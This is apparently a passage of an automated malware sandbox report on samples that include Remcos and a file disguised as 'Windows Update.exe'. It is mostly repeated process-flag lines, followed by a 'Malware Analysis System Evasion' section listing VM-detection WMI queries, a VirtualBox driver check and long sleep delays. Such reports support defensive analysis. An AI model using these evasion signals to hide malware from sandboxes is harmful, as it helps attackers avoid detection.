                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Delayed program exit foundShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040D0FF Sleep,ExitProcess,4_2_0040D0FF
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe TID: 7120Thread sleep count: 60 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5420Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exe TID: 1288Thread sleep count: 878 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exe TID: 1288Thread sleep time: -10536000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 5968Thread sleep time: -57000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe TID: 6184Thread sleep count: 60 > 30
                    Source: C:\Users\user\AppData\Local\Temp\5.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\5.exe TID: 5628Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -3870000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6420Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5772Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5424Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2920Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5436Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\4.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_00416A9F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5647Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2789Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 878Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\21.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 140000
